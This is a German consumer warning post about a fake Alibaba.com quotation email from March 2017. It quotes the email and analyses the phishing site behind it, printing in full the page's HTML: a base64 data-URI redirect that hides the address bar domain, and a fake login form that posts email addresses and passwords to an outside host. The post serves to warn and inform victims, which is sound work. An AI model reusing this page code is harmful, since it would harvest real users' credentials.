Chao as Request for Quotation von [email protected] ([email protected])

Am Dienstag, den 07. März 2017 wurde durch unbekannte Dritte die folgende E-Mail in englischer Sprache versendet. Achtung: Die E-Mail stammt nicht von Alibaba.com! Klicken Sie deswegen nicht auf die Links und geben Sie keine Daten ein!

Betreff: Chao as Request for Quotation
Absender: [email protected] ([email protected])

www.Alibaba.com

Trade Center IP:74.**.**.126

Chao from Austrailia as Request for Quotation

Quote Now View Order Details

Jacky Lui

Hi,
A request for quotation is waiting for you in Alibaba Trade Center.

To view full details of this RFQ and submit your quotation, please visit quote now.

It contains an attachment. Please sign into Trade Center to check it.

Recent Activity on Alibaba.com:
1. Pipelines for ordering on Alibaba.com
2. Recent new functions and promotions on Alibaba.com

——————————————————————————–
Avast logo This email has been checked for viruses by Avast antivirus software.
www.avast.com

Achtung: Es handelt sich um eine gefälschte E-Mail! Die E-Mail stammt nicht von der Hangzhou Alibaba Advertising Co., Ltd. / Alibaba.com. Das Unternehmen hat mit der E-Mail nichts zu tun!

Die E-Mail behauptet, ein Nutzer aus Australien hätte eine Anfrage eingestellt. Die verlinkte Domain www.balveny.com gehört aber nicht zu Alibaba.com! Auch die E-Mail stammt nicht von @alibaba.com! Klicken Sie deswegen nicht auf die Links und geben Sie keine Daten ein!

Die betrügerische Seite würde zum Login auffordern. Melden Sie sich nicht an! Alle Eingaben würden an unbekannte Dritte übermittelt und könnten anschließend missbraucht werden!

Alibaba.com

Trade Assurance
Let Us Protect Your Orders
From Payment to Delivery
Learn more

Account:
Email address or Member ID

Password:
Password

Sign In

Mobile number sign in

Sign in with: f in

Der von www.balveny.com ausgegebene HTML-Code lädt eine base64-Codierte Seite und sorgt dafür, dass die aufgerufene Domain nicht in der Adresszeile sichtbar ist:

<html><head>
<meta http-equiv=“refresh“ content=“0; URL=data:text/html;charset=utf-8;base64,PHRpdGxlPkFsaWJhYmEmbmJzcDtNYW51ZmFjdHVyZXImbmJzcDtEaXJlY3RvcnkmbmJzcDstJm5ic3A7U3VwcGxpZXJzLCZuYnNwO01hbnVmYWN0dXJlcnMsJm5ic3A7RXhwb3J0ZXJzJm5ic3A7JmFtcDthbXA7Jm5ic3A7SW1wb3J0ZXJzJm5ic3A7PC90aXRsZT4NCg0KDQoNCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly9nLmFsaWNkbi5jb20vdGIvbG9naW4vMC41LjgvaGF2YW5hbG9naW4vaW1hZ2VzL2Zhdmljb24uaWNvP3Y9MjAxNDEwMjIiIHR5cGU9ImltYWdlL3gtaWNvbiIvPg0KDQoNCg0KDQoNCg0KPGJvZHkgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybCgnaHR0cHM6Ly93d3cuc3BpcmVzcmwuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEzLzA0L2ljb24ucG5nJykiPg0KDQo8ZGl2IHN0eWxlPSJwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiAzNDBweDsgaGVpZ2h0OiAzNXB4OyB6LWluZGV4OiAyOyBsZWZ0OiA4ODFweDsgdG9wOiAyMjdweCIgaWQ9ImxheWVyNCIgYWxpZ249Imp1c3RpZnkiPg0KDQoNCg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4gDQpib2R5IHsgDQp3aWR0aDo5MCU7IA0KaGVpZ2h0OjE1MCU7IA0KfSANCjwvc3R5bGU+IA0KDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGF1dG9jb21wbGV0ZSBuYW1lPSJsb2dpbl9mb3JtIiBpZD0ibG9naW5fZm9ybSIgb25zdWJtaXQ9IiIgc3R5bGU9ImxpbmUtaGVpZ2h0OiAxLjIyZW07IG1hcmdpbjogMHB4OyBwYWRkaW5nOiAwcHg7IiBhY3Rpb249Imh0dHA6Ly93d3cuZmlnaHQybGl2ZS5uZXQvaG9tZS9tb2R1bGVzL21vZF9zZWN1ci9fdnRpX2NvbmZpZy90bXAvZGZmNjM3NGFhY2RkNWJhOWFjMTQ5NjNmYjFjYTQ3ZmI2MTJlMmQyZDFkOGEwNjI5NDdhYmQ4NzU0N2Y5MDMxNy8ucGhwXy9kZGRkZGRkZGRkZGRkX2FsaWlpaWlpL3lleWV5ZXlleWV5ZWR1ZHVkdWQyIj4NCg0KDQo8aW5wdXQgbmFtZT0ibG9naW5JZCIgaWQ9ImxvZ2luSWQiIHR5cGU9ImVtYWlsIiBtYXhsZW5ndGg9Ijk2IiB0YWJpbmRleD0iMSJ0aXRsZT0iUGxlYXNlIGVudGVyIHlvdXIgYnVzaW5lc3MgRW1haWwgYWRkcmVzcyJyZXF1aXJlZD0iIiBwbGFjZWhvbGRlcj0iRW1haWwgYWRkcmVzcyBvciBNZW1iZXIgSUQiIGF1dG9jb3JyZWN0PSJvZmYiIGF1dG9jb21wbGV0ZT0ib2ZmIiBzdHlsZT0iZm9udC1zdHlsZTogbm9ybWFsOyBmb250LXZhcmlhbnQ6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IG5vcm1hbDsgbGluZS1oZWlnaHQ6IDEuNTsgZm9udC1mYW1pbHk6IGFyaWFsLCBoZWx2ZXRpY2EsIGNsZWFuLCBzYW5zLXNlcmlmOyB3aWR0aDogMzEwOyBib3JkZXI6IDFweCBzb2xpZCByZ2IoMTg2LCAxODYsIDE4Nik7IG1hcmdpbi1ib3R0b206IDE1cHg7IHBhZGRpbmc6IDVweDsgaGVpZ2h0OiAyNzsgYm9yZGVyLXRvcC1sZWZ0LXJhZGl1czogM3B4OyBib3JkZXItdG9wLXJpZ2h0LXJhZGl1czogM3B4OyBib3JkZXItYm90dG9tLXJpZ2h0LXJhZGl1czogM3B4OyBib3JkZXItYm90dG9tLWxlZnQtcmFkaXVzOiAzcHgiIHNpemU9IjUwIj48L2Rpdj4NCjxkaXYgc3R5bGU9InBvc2l0aW9uOiBhYnNvbHV0ZTsgd2lkdGg6IDMzOXB4OyBoZWlnaHQ6IDM5cHg7IHotaW5kZXg6IDM7IGxlZnQ6IDg4MHB4OyB0b3A6IDMzNXB4IiBpZD0ibGF5ZXI1Ij48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJTSSIgaWQ9ImlkU0lCdXR0b245IiB2YWx1ZT0iU2lnbiBJbiIgY2xhc3M9ImRlZmF1bHQiIHN0eWxlPSJsaW5lLWhlaWdodDogMTlweDsgZm9udC1zaXplOiAxNHB4OyBmb250LWZhbWlseTogJ1NlZ29lIFVJIFdlYiBTZW1pYm9sZCcsICdTZWdvZSBVSSBXZWIgUmVndWxhcicsICdTZWdvZSBVSScsICdTZWdvZSBVSSBTeW1ib2wnLCAnSGVsdmV0aWNhIE5ldWUnLCBBcmlhbDsgLXdlYmtpdC1hcHBlYXJhbmNlOiBub25lOyBib3JkZXItdG9wLWxlZnQtcmFkaXVzOiAwcHg7IGJvcmRlci10b3AtcmlnaHQtcmFkaXVzOiAwcHg7IGJvcmRlci1ib3R0b20tcmlnaHQtcmFkaXVzOiAwcHg7IGJvcmRlci1ib3R0b20tbGVmdC1yYWRpdXM6IDBweDsgaGVpZ2h0OiAyODsgbWluLXdpZHRoOiA2ZW07IGJhY2tncm91bmQtY29sb3I6ICNGRjc1MTk7IGNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7IGJvcmRlcjogMHB4IG5vbmU7OyBmbG9hdDpsZWZ0OyBwYWRkaW5nLWxlZnQ6MTJweDsgcGFkZGluZy1yaWdodDoxMnB4OyBwYWRkaW5nLXRvcDozcHg7IHBhZGRpbmctYm90dG9tOjVweDsgd2lkdGg6MzEwOyBmb250LXdlaWdodDo3MDAiPjwvZGl2PjxkaXYgc3R5bGU9InBvc2l0aW9uOiBhYnNvbHV0ZTsgd2lkdGg6IDEwMHB4OyBoZWlnaHQ6IDU0cHg7IHotaW5kZXg6IDE7IGxlZnQ6IDg4MXB4OyB0b3A6IDI5MHB4IiBpZD0ibGF5ZXIzIiBhbGlnbj0ianVzdGlmeSI+DQoNCg0KPGlucHV0IG5hbWU9InBhc3N3b3JkIiBpZD0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIiBtYXhsZW5ndGg9IjY0IiB0YWJpbmRleD0iMiJ0aXRsZT0iUGxlYXNlIGVudGVyIEVtYWlsIHBhc3N3b3JkInJlcXVpcmVkPSIiIHBsYWNlaG9sZGVyPSJQYXNzd29yZCIgYXV0b2NvcnJlY3Q9Im9mZiIgYXV0b2NvbXBsZXRlPSJvZmYiIHZhbHVlIHN0eWxlPSJmb250LXN0eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudDogbm9ybWFsOyBmb250LXdlaWdodDogbm9ybWFsOyBsaW5lLWhlaWdodDogMS41OyBmb250LWZhbWlseTogYXJpYWwsIGhlbHZldGljYSwgY2xlYW4sIHNhbnMtc2VyaWY7IHdpZHRoOiAzMTA7IGJvcmRlcjogMXB4IHNvbGlkIHJnYigxODYsIDE4NiwgMTg2KTsgbWFyZ2luLWJvdHRvbTogMTVweDsgcGFkZGluZzogNXB4OyBoZWlnaHQ6IDI3OyBib3JkZXItdG9wLWxlZnQtcmFkaXVzOiAzcHg7IGJvcmRlci10b3AtcmlnaHQtcmFkaXVzOiAzcHg7IGJvcmRlci1ib3R0b20tcmlnaHQtcmFkaXVzOiAzcHg7IGJvcmRlci1ib3R0b20tbGVmdC1yYWRpdXM6IDNweCIgc2l6ZT0iMTAwIj48L2Rpdj4NCg0KPC9mb3JtPg0KPC9kaXY+DQoNCg0KPC9ib2R5Pg0KDQoNCjwvaHRtbD4=“b8b555ab7a0332711c886f265d11f0a7″>
<script language=“JavaScript“ type=“text/javascript“>

function redirect() {
setTimeout(„window.location.replace(‚Signon.php?LOB=RBGLogon&_pageLabel=a825fe16b68521f80dcb72996abf814a‘)“, 0); }

</script>
</head>

Auch wenn die Seite vielleicht nach einer Alibaba-Seite aussieht, so funktioniert – außer „Sign In“ keiner der sichtbaren Links. Den Hauptteil der Seite macht ein von www.spiresrl.com/wp-content/uploads/2013/04/icon.png geladenes Hintergrundbild aus, über das die Eingabefelder gelegt worden sind:

<title>Alibaba&nbsp;Manufacturer&nbsp;Directory&nbsp;-&nbsp;Suppliers,&nbsp;Manufacturers,&nbsp;Exporters&nbsp;&amp;amp;&nbsp;Importers&nbsp;</title>

<link rel=“shortcut icon“ href=“https://g.alicdn.com/tb/login/0.5.8/havanalogin/images/favicon.ico?v=20141022″ type=“image/x-icon“/>
<body style=“background-image: url(‚https://www.spiresrl.com/wp-content/uploads/2013/04/icon.png‘)“>

<div style=“position: absolute; width: 340px; height: 35px; z-index: 2; left: 881px; top: 227px“ id=“layer4″ align=“justify“>

<style type=“text/css“>
body {
width:90%;
height:150%;
}
</style>

<form method=“POST“ autocomplete name=“login_form“ id=“login_form“ onsubmit=““ style=“line-height: 1.22em; margin: 0px; padding: 0px;“ action=“http://www.fight2live.net/home/modules/mod_secur/_vti_config/tmp/dff6374aacdd5ba9ac14963fb1ca47fb612e2d2d1d8a062947abd87547f90317/.php_/ddddddddddddd_aliiiiii/yeyeyeyeyeyedududud2″>
<input name=“loginId“ id=“loginId“ type=“email“ maxlength=“96″ tabindex=“1″title=“Please enter your business Email address“required=““ placeholder=“Email address or Member ID“ autocorrect=“off“ autocomplete=“off“ style=“font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.5; font-family: arial, helvetica, clean, sans-serif; width: 310; border: 1px solid rgb(186, 186, 186); margin-bottom: 15px; padding: 5px; height: 27; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px“ size=“50″></div>
<div style=“position: absolute; width: 339px; height: 39px; z-index: 3; left: 880px; top: 335px“ id=“layer5″><input type=“submit“ name=“SI“ id=“idSIButton9″ value=“Sign In“ class=“default“ style=“line-height: 19px; font-size: 14px; font-family: ‚Segoe UI Web Semibold‘, ‚Segoe UI Web Regular‘, ‚Segoe UI‘, ‚Segoe UI Symbol‘, ‚Helvetica Neue‘, Arial; -webkit-appearance: none; border-top-left-radius: 0px; border-top-right-radius: 0px; border-bottom-right-radius: 0px; border-bottom-left-radius: 0px; height: 28; min-width: 6em; background-color: #FF7519; color: rgb(255, 255, 255); border: 0px none;; float:left; padding-left:12px; padding-right:12px; padding-top:3px; padding-bottom:5px; width:310; font-weight:700″></div><div style=“position: absolute; width: 100px; height: 54px; z-index: 1; left: 881px; top: 290px“ id=“layer3″ align=“justify“>
<input name=“password“ id=“password“ type=“password“ maxlength=“64″ tabindex=“2″title=“Please enter Email password“required=““ placeholder=“Password“ autocorrect=“off“ autocomplete=“off“ value style=“font-style: normal; font-variant: normal; font-weight: normal; line-height: 1.5; font-family: arial, helvetica, clean, sans-serif; width: 310; border: 1px solid rgb(186, 186, 186); margin-bottom: 15px; padding: 5px; height: 27; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px“ size=“100″></div>

</form>
</div>
</body>
</html>

Alle Eingaben werden an die Domain www.fight2live.net gesendet, unter der aktuell diverse Phishing-Seiten zu unterschiedlichen Anbietern vorhanden sind. Nach dem Absenden kommt u. U. die Meldung „Please enter your email address or member ID“:

 

Haben Sie auf die Nachricht reagiert?

Alibaba.com hat eine Info-Seite zum Thema „Phishing“. Ändern Sie umgehend Ihr Passwort! Falls das nicht mehr möglich ist, dann wenden Sie sich an [email protected].

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.